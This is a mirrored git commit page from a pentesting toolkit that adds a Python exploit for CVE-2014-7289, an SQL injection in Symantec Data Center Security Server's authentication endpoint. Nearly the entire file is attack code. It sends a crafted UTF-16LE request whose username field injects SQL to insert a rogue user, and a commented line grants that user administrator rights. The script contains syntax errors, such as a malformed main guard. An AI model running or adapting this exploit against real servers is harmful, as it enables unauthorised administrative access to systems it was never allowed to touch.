mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-25 18:01:01 -04:00
sqli exploit example forCVE-2014-7289
This commit is contained in:
Mari Wahl
parent
3b64acb80e
commit
94edfc7bb0
1 changed files with 43 additions and 0 deletions
43
Web_Security/SQLi/CVE-2014-7289_exploit.py
Normal file
43
Web_Security/SQLi/CVE-2014-7289_exploit.py
Normal file
|
|
@ -0,0 +1,43 @@
|
||||||
|
#!/bin/env python
|
||||||
|
# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
|
||||||
|
|
||||||
|
|
||||||
|
import httplib
|
||||||
|
def send_request(host,data):
|
||||||
|
params = data
|
||||||
|
headers = {"AppFire-Format-Version": "1.0",
|
||||||
|
"AppFire-Charset": "UTF-16LE",
|
||||||
|
"Content-Type":"application/x-appfire",
|
||||||
|
"User-Agent":"Java/1.7.0_45",
|
||||||
|
}
|
||||||
|
conn = httplib.HTTPSConnection(host)
|
||||||
|
conn.request("POST", "/sis-ui/authenticate", params, headers)
|
||||||
|
response = conn.getresponse()
|
||||||
|
data=response.read()
|
||||||
|
conn.close()
|
||||||
|
return response,data
|
||||||
|
|
||||||
|
if __name__ = '__main__'
|
||||||
|
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
|
||||||
|
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
|
||||||
|
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
|
||||||
|
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
|
||||||
|
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
|
||||||
|
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
|
||||||
|
07:13:23', '1', '0', '0',
|
||||||
|
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
|
||||||
|
-- '' " # add user to USR table
|
||||||
|
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
|
||||||
|
ROLERID) VALUES (1504, 1); -- " # add user to admin group
|
||||||
|
data+="\r\nan=Symantec Data Center Security Server
|
||||||
|
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
|
||||||
|
data = data.encode('utf-16le')
|
||||||
|
|
||||||
|
eof_flag="\nEOF_FLAG\n"
|
||||||
|
header = header %(len(data))
|
||||||
|
payload=header+data+eof_flag
|
||||||
|
|
||||||
|
response,data = send_request("<host>:4443",payload)
|
||||||
|
|
||||||
|
print data.decode('utf-16le')
|
||||||
|
print response.status
|
||||||
Loading…
Add table
Add a link
Reference in a new issue